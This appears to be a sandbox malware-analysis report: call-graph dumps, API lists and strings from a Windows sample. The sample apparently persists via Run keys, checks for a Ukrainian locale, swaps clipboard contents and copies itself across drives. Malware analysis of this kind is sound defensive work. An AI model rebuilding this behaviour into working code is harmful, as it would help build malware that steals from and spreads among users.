4062a3 LeaveCriticalSection 5475->5432 5476 40c820 71 API calls 5477 406099 5476->5477 5477->5475 5478 4061b8 5477->5478 5479 4060f4 memcpy 5477->5479 5480 4061e1 5478->5480 5481 405cf0 68 API calls 5478->5481 5482 40a1b0 __aligned_recalloc_base 3 API calls 5479->5482 5483 40a1b0 __aligned_recalloc_base 3 API calls 5480->5483 5481->5480 5484 406118 5482->5484 5485 406202 5483->5485 5486 40a220 8 API calls 5484->5486 5485->5475 5487 406211 CreateFileW 5485->5487 5488 406128 5486->5488 5487->5475 5489 406234 5487->5489 5490 40a1b0 __aligned_recalloc_base 3 API calls 5488->5490 5492 406251 WriteFile 5489->5492 5493 40628f FlushFileBuffers 5489->5493 5491 40614f 5490->5491 5494 40c190 7 API calls 5491->5494 5492->5489 5493->5475 5495 406185 5494->5495 5496 407310 64 API calls 5495->5496 5496->5478 5500 40bdd0 5497->5500 5505 40bde1 5500->5505 5501 40a220 8 API calls 5501->5505 5502 40bd30 70 API calls 5502->5505 5503 40a1b0 __aligned_recalloc_base 3 API calls 5504 406082 5503->5504 5504->5475 5504->5476 5505->5501 5505->5502 5506 407af0 68 API calls 5505->5506 5507 40bdfb 5505->5507 5508 40be3b memcmp 5505->5508 5506->5505 5507->5503 5508->5505 5508->5507 5509 40cf50 5510 40cfbe 5509->5510 5511 40cf66 5509->5511 5511->5510 5512 40cf70 5511->5512 5513 40cfc3 5511->5513 5514 40d013 5511->5514 5515 409d90 7 API calls 5512->5515 5517 40cfe8 5513->5517 5518 40cfdb InterlockedDecrement 5513->5518 5543 40bbc0 5514->5543 5519 40cf7d 5515->5519 5520 40a1b0 __aligned_recalloc_base 3 API calls 5517->5520 5518->5517 5532 4023d0 5519->5532 5522 40cff4 5520->5522 5524 40a1b0 __aligned_recalloc_base 3 API calls 5522->5524 5524->5510 5526 40d039 5526->5510 5529 40d071 IsBadReadPtr 5526->5529 5531 40b570 184 API calls 5526->5531 5548 40bcc0 5526->5548 5528 40cfab InterlockedIncrement 5528->5510 5529->5526 5531->5526 5533 402413 5532->5533 5534 4023d9 5532->5534 5536 40ad40 5533->5536 5534->5533 5535 4023ea InterlockedIncrement 5534->5535 5535->5533 5537 40add0 2 API calls 5536->5537 5538 40ad4f 5537->5538 5539 40ad59 5538->5539 5540 40ad5d EnterCriticalSection 5538->5540 5539->5510 5539->5528 5541 40ad7c LeaveCriticalSection 5540->5541 5541->5539 5544 40bbd3 5543->5544 5545 40bbfd memcpy 5543->5545 5546 409fe0 9 API calls 5544->5546 5545->5526 5547 40bbf4 5546->5547 5547->5545 5549 40bce9 5548->5549 5550 40bcde 5548->5550 5549->5550 5551 40bd01 memmove 5549->5551 5550->5526 5551->5550 5552 401f50 GetQueuedCompletionStatus 5553 401f92 5552->5553 5554 402008 5552->5554 5555 401f97 WSAGetOverlappedResult 5553->5555 5559 401d60 5553->5559 5555->5553 5556 401fb9 WSAGetLastError 5555->5556 5556->5553 5558 401fd3 GetQueuedCompletionStatus 5558->5553 5558->5554 5560 401ef2 InterlockedDecrement setsockopt closesocket 5559->5560 5561 401d74 5559->5561 5563 401e39 5560->5563 5561->5560 5562 401d7c 5561->5562 5579 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5562->5579 5563->5558 5565 401d81 InterlockedExchange 5566 401d98 5565->5566 5567 401e4e 5565->5567 5566->5563 5572 401da9 InterlockedDecrement 5566->5572 5573 401dbc InterlockedDecrement InterlockedExchangeAdd 5566->5573 5568 401e67 5567->5568 5569 401e57 InterlockedDecrement 5567->5569 5570 401e72 5568->5570 5571 401e87 InterlockedDecrement 5568->5571 5569->5558 5574 401ae0 4 API calls 5570->5574 5575 401ee9 5571->5575 5572->5558 5576 401e2f 5573->5576 5577 401e7e 5574->5577 5575->5558 5580 401cf0 5576->5580 5577->5558 5579->5565 5581 401d00 InterlockedExchangeAdd 5580->5581 5582 401cfc 5580->5582 5583 401d53 5581->5583 5584 401d17 InterlockedIncrement 5581->5584 5582->5563 5583->5563 5588 401c50 WSARecv 5584->5588 5586 401d46 5586->5583 5587 401d4c InterlockedDecrement 5586->5587 5587->5583 5589 401cd2 5588->5589 5590 401c8e 5588->5590 5589->5586 5591 401c90 WSAGetLastError 5590->5591 5592 401ca4 Sleep WSARecv 5590->5592 5593 401cdb 5590->5593 5591->5589 5591->5590 5592->5589 5592->5591 5593->5586 5594 40d550 5604 4013b0 5594->5604 5596 40d5dd 5598 40d55d 5598->5596 5599 40d577 InterlockedExchangeAdd 5598->5599 5600 40d5bb WaitForSingleObject 5598->5600 5616 40b200 EnterCriticalSection 5598->5616 5621 40b520 5598->5621 5599->5598 5599->5600 5600->5598 5601 40d5d4 5600->5601 5624 401330 5601->5624 5605 409d90 7 API calls 5604->5605 5606 4013bb CreateEventA socket 5605->5606 5607 4013f2 5606->5607 5611 4013f8 5606->5611 5608 401330 7 API calls 5607->5608 5608->5611 5609 401401 bind 5612 401444 CreateThread 5609->5612 5613 401434 5609->5613 5610 401462 5610->5598 5611->5609 5611->5610 5612->5610 5634 401100 5612->5634 5614 401330 7 API calls 5613->5614 5615 40143a 5614->5615 5615->5598 5617 40b237 LeaveCriticalSection 5616->5617 5618 40b21f 5616->5618 5617->5598 5619 40bec0 3 API calls 5618->5619 5620 40b22a 5619->5620 5620->5617 5622 40b480 13 API calls 5621->5622 5623 40b561 5622->5623 5623->5598 5625 401339 5624->5625 5626 40139b 5624->5626 5625->5626 5627 401341 SetEvent WaitForSingleObject 5625->5627 5626->5596 5632 401362 5627->5632 5628 40138b 5663 40ab40 shutdown closesocket 5628->5663 5630 40a1b0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5630->5632 5631 401395 5633 40a1b0 __aligned_recalloc_base 3 API calls 5631->5633 5632->5628 5632->5630 5633->5626 5635 401115 ioctlsocket 5634->5635 5636 4011e4 5635->5636 5642 40113a 5635->5642 5637 40a1b0 __aligned_recalloc_base 3 API calls 5636->5637 5639 4011ea 5637->5639 5638 4011cd WaitForSingleObject 5638->5635 5638->5636 5640 409fe0 9 API calls 5640->5642 5641 401168 recvfrom 5641->5638 5641->5642 5642->5638 5642->5640 5642->5641 5643 4011ad InterlockedExchangeAdd 5642->5643 5645 401000 5643->5645 5646 401014 5645->5646 5647 40103b 5646->5647 5648 409d90 7 API calls 5646->5648 5656 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5647->5656 5648->5647 5650 40105b 5657 401580 5650->5657 5652 4010ec 5652->5642 5653 4010a3 IsBadReadPtr 5655 401071 5653->5655 5654 4010d8 memmove 5654->5655 5655->5652 5655->5653 5655->5654 5656->5650 5658 401592 5657->5658 5659 4015a5 memcpy 5657->5659 5660 409fe0 9 API calls 5658->5660 5662 4015c1 5659->5662 5661 40159f 5660->5661 5661->5659 5662->5655 5663->5631 5888 40ca90 5889 40ad40 4 API calls 5888->5889 5890 40caa3 5889->5890 5891 40caba 5890->5891 5893 40cad0 InterlockedExchangeAdd 5890->5893 5894 40caed 5893->5894 5904 40cae6 5893->5904 5910 40cdc0 5894->5910 5897 40cb0d InterlockedIncrement 5907 40cb17 5897->5907 5898 40b520 13 API calls 5898->5907 5899 40cb40 5917 40aa20 inet_ntoa 5899->5917 5901 40cb4c 5902 40cc10 InterlockedDecrement 5901->5902 5918 40ab40 shutdown closesocket 5902->5918 5904->5891 5905 409fa0 _invalid_parameter 7 API calls 5905->5907 5906 40ccf0 6 API calls 5906->5907 5907->5898 5907->5899 5907->5902 5907->5905 5907->5906 5908 40a1b0 __aligned_recalloc_base 3 API calls 5907->5908 5909 40b570 184 API calls 5907->5909 5908->5907 5909->5907 5911 40cdcd socket 5910->5911 5912 40cde2 htons connect 5911->5912 5913 40ce3f 5911->5913 5912->5913 5914 40ce2a 5912->5914 5913->5911 5915 40cafd 5913->5915 5919 40ab40 shutdown closesocket 5914->5919 5915->5897 5915->5904 5917->5901 5918->5904 5919->5915 5920 406c16 5923 406bf8 5920->5923 5921 406d38 Sleep 5921->5923 5922 406c29 5924 4062c0 4 API calls 5922->5924 5923->5921 5923->5922 5925 406d48 ExitThread 5923->5925 5926 4063a0 4 API calls 5923->5926 5928 406c3a 5924->5928 5926->5923 5927 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5930 406cd6 wsprintfW 5927->5930 5931 406ceb wsprintfW 5927->5931 5928->5927 5929 406c5b 5928->5929 5930->5931 5932 4066b0 51 API calls 5931->5932 5932->5929 5933 40b420 5934 40b423 WaitForSingleObject 5933->5934 5935 40b451 5934->5935 5936 40b43b InterlockedDecrement 5934->5936 5937 40b44a 5936->5937 5937->5934 5938 40ab60 15 API calls 5937->5938 5938->5937 5939 401920 GetTickCount WaitForSingleObject 5940 401ac9 5939->5940 5941 40194d WSAWaitForMultipleEvents 5939->5941 5942 4019f0 GetTickCount 5941->5942 5943 40196a WSAEnumNetworkEvents 5941->5943 5944 401a43 GetTickCount 5942->5944 5945 401a05 EnterCriticalSection 5942->5945 5943->5942 5959 401983 5943->5959 5946 401ab5 WaitForSingleObject 5944->5946 5947 401a4e EnterCriticalSection 5944->5947 5948 401a16 5945->5948 5949 401a3a LeaveCriticalSection 5945->5949 5946->5940 5946->5941 5950 401aa1 LeaveCriticalSection GetTickCount 5947->5950 5951 401a5f InterlockedExchangeAdd 5947->5951 5954 401a29 LeaveCriticalSection 5948->5954 5981 401820 5948->5981 5949->5946 5950->5946 5999 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5951->5999 5952 401992 accept 5952->5942 5952->5959 5954->5946 5956 401a72 5956->5950 5956->5951 6000 40ab40 shutdown closesocket 5956->6000 5959->5942 5959->5952 5960 401cf0 7 API calls 5959->5960 5961 4022c0 5959->5961 5960->5942 5962 4022d2 EnterCriticalSection 5961->5962 5963 4022cd 5961->5963 5964 4022e7 5962->5964 5965 4022fd LeaveCriticalSection 5962->5965 5963->5959 5964->5965 5966 402308 5965->5966 5967 40230f 5965->5967 5966->5959 5968 409d90 7 API calls 5967->5968 5969 402319 5968->5969 5970 402326 getpeername CreateIoCompletionPort 5969->5970 5971 4023b8 5969->5971 5973 4023b2 5970->5973 5974 402366 5970->5974 6003 40ab40 shutdown closesocket 5971->6003 5975 40a1b0 __aligned_recalloc_base 3 API calls 5973->5975 6001 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5974->6001 5975->5971 5976 4023c3 5976->5959 5978 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6002 4021e0 EnterCriticalSection LeaveCriticalSection 5978->6002 5980 4023ab 5980->5959 5982 401830 5981->5982 5991 40190f 5981->5991 5983 40183d InterlockedExchangeAdd 5982->5983 5982->5991 5984 401854 5983->5984 5983->5991 5985 401880 5984->5985 5984->5991 6004 4017a0 EnterCriticalSection 5984->6004 5989 401891 5985->5989 6013 40ab40 shutdown closesocket 5985->6013 5987 4018a7 InterlockedDecrement 5992 401901 5987->5992 5989->5987 5989->5992 5990 402247 5990->5949 5991->5949 5992->5990 5993 402265 EnterCriticalSection 5992->5993 5994 40229c LeaveCriticalSection DeleteCriticalSection 5993->5994 5997 40227d 5993->5997 5995 40a1b0 __aligned_recalloc_base 3 API calls 5994->5995 5995->5990 5996 40a1b0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5996->5997 5997->5996 5998 40229b 5997->5998 5998->5994 5999->5956 6000->5956 6001->5978 6002->5980 6003->5976 6005 401807 LeaveCriticalSection 6004->6005 6006 4017ba InterlockedExchangeAdd 6004->6006 6005->5984 6007 4017ca LeaveCriticalSection 6006->6007 6008 4017d9 6006->6008 6007->5984 6009 40a1b0 __aligned_recalloc_base 3 API calls 6008->6009 6010 4017fe 6009->6010 6011 40a1b0 __aligned_recalloc_base 3 API calls 6010->6011 6012 401804 6011->6012 6012->6005 6013->5989 6014 40d520 6017 401200 6014->6017 6016 40d542 6018 401314 6017->6018 6019 40121d 6017->6019 6018->6016 6019->6018 6020 409fa0 _invalid_parameter 7 API calls 6019->6020 6021 401247 memcpy htons 6020->6021 6022 4012ed 6021->6022 6023 401297 sendto 6021->6023 6024 40a1b0 __aligned_recalloc_base 3 API calls 6022->6024 6025 4012b6 InterlockedExchangeAdd 6023->6025 6026 4012e9 6023->6026 6028 4012fc 6024->6028 6025->6023 6029 4012cc 6025->6029 6026->6022 6027 40130a 6026->6027 6030 40a1b0 __aligned_recalloc_base 3 API calls 6027->6030 6028->6016 6031 40a1b0 __aligned_recalloc_base 3 API calls 6029->6031 6030->6018 6032 4012db 6031->6032 6032->6016 6033 40e121 6035 40e12a 6033->6035 6034 40e21d 6035->6034 6036 40e193 lstrcmpiW 6035->6036 6037 40e213 SysFreeString 6036->6037 6038 40e1a6 6036->6038 6037->6034 6039 40df10 2 API calls 6038->6039 6041 40e1b4 6039->6041 6040 40e205 6040->6037 6041->6037 6041->6040 6042 40e1e3 lstrcmpiW 6041->6042 6043 40e1f5 6042->6043 6044 40e1fb SysFreeString 6042->6044 6043->6044 6044->6040 5678 405970 GetWindowLongW 5679 405994 5678->5679 5680 4059b6 5678->5680 5681 4059a1 5679->5681 5682 405a27 IsClipboardFormatAvailable 5679->5682 5684 405a06 5680->5684 5685 4059ee SetWindowLongW 5680->5685 5696 4059b1 5680->5696 5688 4059c4 SetClipboardViewer SetWindowLongW 5681->5688 5689 4059a7 5681->5689 5686 405a43 IsClipboardFormatAvailable 5682->5686 5687 405a3a 5682->5687 5683 405ba4 DefWindowProcA 5690 405a0c SendMessageA 5684->5690 5684->5696 5685->5696 5686->5687 5691 405a58 IsClipboardFormatAvailable 5686->5691 5693 405a75 OpenClipboard 5687->5693 5712 405b3c 5687->5712 5688->5683 5692 405b5d RegisterRawInputDevices ChangeClipboardChain 5689->5692 5689->5696 5690->5696 5691->5687 5692->5683 5695 405a85 GetClipboardData 5693->5695 5693->5712 5694 405b45 SendMessageA 5694->5696 5695->5696 5697 405a9d GlobalLock 5695->5697 5696->5683 5697->5696 5698 405ab5 5697->5698 5699 405ac8 5698->5699 5700 405ae9 5698->5700 5701 405afe 5699->5701 5702 405ace 5699->5702 5703 405690 13 API calls 5700->5703 5719 4057b0 5701->5719 5704 405ad4 GlobalUnlock CloseClipboard 5702->5704 5713 405570 5702->5713 5703->5704 5708 405b27 5704->5708 5704->5712 5727 404970 lstrlenW 5708->5727 5711 40a1b0 __aligned_recalloc_base 3 API calls 5711->5712 5712->5694 5712->5696 5714 40557b 5713->5714 5715 405581 lstrlenW 5714->5715 5716 405594 5714->5716 5717 409fa0 _invalid_parameter 7 API calls 5714->5717 5718 4055b1 lstrcpynW 5714->5718 5715->5714 5715->5716 5716->5704 5717->5714 5718->5714 5718->5716 5724 4057bd 5719->5724 5720 4057c3 lstrlenA 5720->5724 5725 4057d6 5720->5725 5721 405630 2 API calls 5721->5724 5722 409fa0 _invalid_parameter 7 API calls 5722->5724 5724->5720 5724->5721 5724->5722 5724->5725 5726 40a1b0 __aligned_recalloc_base 3 API calls 5724->5726 5761 405760 5724->5761 5725->5704 5726->5724 5728 4049a4 5727->5728 5730 404c00 5728->5730 5736 404d30 StrStrW 5728->5736 5757 404bee 5728->5757 5729 404dbb StrStrW 5731 404dd2 StrStrW 5729->5731 5732 404dce 5729->5732 5730->5729 5730->5757 5733 404de5 5731->5733 5734 404de9 StrStrW 5731->5734 5732->5731 5733->5734 5735 404dfc 5734->5735 5743 404e12 5735->5743 5766 4048a0 lstrlenW 5735->5766 5736->5730 5738 404d58 StrStrW 5736->5738 5738->5730 5739 404d80 StrStrW 5738->5739 5739->5730 5740 40539b StrStrW 5741 4053b7 StrStrW 5740->5741 5747 4053ae StrStrW 5740->5747 5742 4053d3 StrStrW 5741->5742 5741->5747 5742->5747 5743->5740 5743->5747 5743->5757 5745 405470 StrStrW 5748 405483 5745->5748 5749 40548a StrStrW 5745->5749 5746 405469 5746->5745 5747->5745 5747->5746 5748->5749 5750 4054a4 StrStrW 5749->5750 5751 40549d 5749->5751 5752 4054b7 5750->5752 5753 4054be StrStrW 5750->5753 5751->5750 5752->5753 5754 4054d1 5753->5754 5755 4054d8 lstrlenA 5753->5755 5754->5755 5756 4054eb GlobalAlloc 5755->5756 5755->5757 5756->5757 5758 405506 GlobalLock 5756->5758 5757->5711 5758->5757 5759 405519 memcpy GlobalUnlock OpenClipboard 5758->5759 5759->5757 5760 405546 EmptyClipboard SetClipboardData CloseClipboard 5759->5760 5760->5757 5762 40576b 5761->5762 5763 405771 lstrlenA 5762->5763 5764 405630 2 API calls 5762->5764 5765 4057a4 5762->5765 5763->5762 5764->5762 5765->5724 5769 4048c4 5766->5769 5767 40490d 5767->5743 5768 404911 iswalpha 5768->5769 5770 40492c iswdigit 5768->5770 5769->5767 5769->5768 5769->5770 5770->5769 5771 40d5f0 5777 401470 5771->5777 5773 40d604 5774 40d615 WaitForSingleObject 5773->5774 5776 40d62f 5773->5776 5775 401330 7 API calls 5774->5775 5775->5776 5778 401483 5777->5778 5779 401572 5777->5779 5778->5779 5780 409d90 7 API calls 5778->5780 5779->5773 5781 401498 CreateEventA socket 5780->5781 5782 4014d5 5781->5782 5783 4014cf 5781->5783 5782->5779 5785 4014e2 htons setsockopt bind 5782->5785 5784 401330 7 API calls 5783->5784 5784->5782 5786 401546 5785->5786 5787 401558 CreateThread 5785->5787 5788 401330 7 API calls 5786->5788 5787->5779 5790 401100 20 API calls __aligned_recalloc_base 5787->5790 5789 40154c 5788->5789 5789->5773 6045 40cc30 6050 40cc90 6045->6050 6048 40cc5e 6049 40cc90 send 6049->6048 6051 40cca1 send 6050->6051 6052 40cc43 6051->6052 6053 40ccbe 6051->6053 6052->6048 6052->6049 6053->6051 6053->6052 6054 40ceb0 6055 40ceb4 6054->6055 6056 40b200 5 API calls 6055->6056 6057 40ced0 WaitForSingleObject 6055->6057 6058 40cad0 198 API calls 6055->6058 6059 40cef5 6055->6059 6056->6055 6057->6055 6057->6059 6058->6055 5791 40ee74 5792 40ee7c 5791->5792 5793 40ef30 5792->5793 5797 40f0b1 5792->5797 5796 40eeb5 5796->5793 5801 40ef9c RtlUnwind 5796->5801 5799 40f0c6 5797->5799 5800 40f0e2 5797->5800 5798 40f151 NtQueryVirtualMemory 5798->5800 5799->5798 5799->5800 5800->5796 5802 40efb4 5801->5802 5802->5796 6060 406a39 6062 4069df 6060->6062 6061 406a0f lstrcmpiW 6061->6062 6062->6061 6063 406b8a FindNextFileW 6062->6063 6064 406a76 PathMatchSpecW 6062->6064 6067 406af4 PathFileExistsW 6062->6067 6073 406570 11 API calls 6062->6073 6065 4069b3 lstrcmpW 6063->6065 6066 406ba6 FindClose 6063->6066 6064->6062 6068 406a97 wsprintfW SetFileAttributesW DeleteFileW 6064->6068 6065->6062 6069 4069c9 lstrcmpW 6065->6069 6070 406bb3 6066->6070 6067->6062 6071 406b0a wsprintfW wsprintfW 6067->6071 6068->6062 6069->6062 6071->6062 6072 406b74 MoveFileExW 6071->6072 6072->6063 6073->6062 5803 40757a ExitThread 5804 40ee7c 5805 40ee9a 5804->5805 5807 40ef30 5804->5807 5806 40f0b1 NtQueryVirtualMemory 5805->5806 5809 40eeb5 5806->5809 5808 40ef9c RtlUnwind 5808->5809 5809->5807 5809->5808 5810 405f7d 5811 405f11 5810->5811 5812 405f7b 5811->5812 5815 405f66 memcpy 5811->5815 5813 40a1b0 __aligned_recalloc_base 3 API calls 5812->5813 5814 405f88 LeaveCriticalSection 5813->5814 5815->5812

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 65 40e730-40e75c GetLocaleInfoA strcmp 66 40e762 65->66 67 40e75e-40e760 65->67 68 40e764-40e767 66->68 67->68
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                                                                                                                                                                                                    • strcmp.NTDLL ref: 0040E752
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocalestrcmp
                                                                                                                                                                                                                                                    • String ID: UKR
                                                                                                                                                                                                                                                    • API String ID: 3191669094-64918367
                                                                                                                                                                                                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                                                                                                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000BB8), ref: 0040759E
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
                                                                                                                                                                                                                                                    • PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 0040763A
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                                                                                                                                                                                                    • wcscmp.NTDLL ref: 00407663
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                                                                                                                                                                                                    • API String ID: 4172876685-2783337622
                                                                                                                                                                                                                                                    • Opcode ID: be37c590e1d8e90253e276ab3f8f4dbbb477af03a6aa52447b81e277da3d58b1
                                                                                                                                                                                                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be37c590e1d8e90253e276ab3f8f4dbbb477af03a6aa52447b81e277da3d58b1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 59 40e980-40e9e0 memset * 2 CreateProcessW 60 40e9f1-40ea15 ShellExecuteW 59->60 61 40e9e2-40e9ef Sleep 59->61 63 40ea26 60->63 64 40ea17-40ea24 Sleep 60->64 62 40ea28-40ea2b 61->62 63->62 64->62
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040E98E
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040E99E
                                                                                                                                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000003E8), ref: 0040E9E7
                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                                                                    • String ID: $D$Gy@$open
                                                                                                                                                                                                                                                    • API String ID: 3787208655-4184347819
                                                                                                                                                                                                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                                                                                                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 69 4066b0-4066c5 _chkstk 70 4066c7-4066c9 69->70 71 4066ce-406780 wsprintfW * 5 PathFileExistsW 69->71 72 406bb9-406bbc 70->72 73 406782-4067a3 call 40e770 71->73 74 4067c4-4067d3 PathFileExistsW 71->74 73->74 83 4067a5-4067be SetFileAttributesW DeleteFileW 73->83 75 406874-406883 PathFileExistsW 74->75 76 4067d9-4067e8 PathFileExistsW 74->76 80 406885-40688b 75->80 81 4068ca-4068eb FindFirstFileW 75->81 78 406809-406818 PathFileExistsW 76->78 79 4067ea-406803 SetFileAttributesW DeleteFileW 76->79 86 40681a-40682b CreateDirectoryW 78->86 87 40683c-40684b PathFileExistsW 78->87 79->78 88 4068a5-4068b8 call 406460 80->88 89 40688d-4068a3 call 406460 80->89 84 4068f1-4069a9 81->84 85 406bb3 81->85 83->74 91 4069b3-4069c7 lstrcmpW 84->91 85->72 86->87 92 40682d-406836 SetFileAttributesW 86->92 87->75 93 40684d-406863 CopyFileW 87->93 100 4068bb-4068c4 SetFileAttributesW 88->100 89->100 96 4069c9-4069dd lstrcmpW 91->96 97 4069df 91->97 92->87 93->75 98 406865-40686e SetFileAttributesW 93->98 96->97 101 4069e4-4069f5 96->101 102 406b8a-406ba0 FindNextFileW 97->102 98->75 100->81 103 406a06-406a0d 101->103 104 4069f7-406a00 101->104 102->91 105 406ba6-406bad FindClose 102->105 106 406a3b-406a44 103->106 107 406a0f-406a2c lstrcmpiW 103->107 104->103 105->85 110 406a46 106->110 111 406a4b-406a5c 106->111 108 406a30-406a37 107->108 109 406a2e 107->109 108->106 109->104 110->102 112 406a6d-406a74 111->112 113 406a5e-406a67 111->113 114 406ae4-406aed 112->114 115 406a76-406a93 PathMatchSpecW 112->115 113->112 116 406af4-406b03 PathFileExistsW 114->116 117 406aef 114->117 118 406a95 115->118 119 406a97-406add wsprintfW SetFileAttributesW DeleteFileW 115->119 120 406b05 116->120 121 406b0a-406b5a wsprintfW * 2 116->121 117->102 118->113 119->114 120->102 122 406b74-406b84 MoveFileExW 121->122 123 406b5c-406b72 call 406570 121->123 122->102 123->102
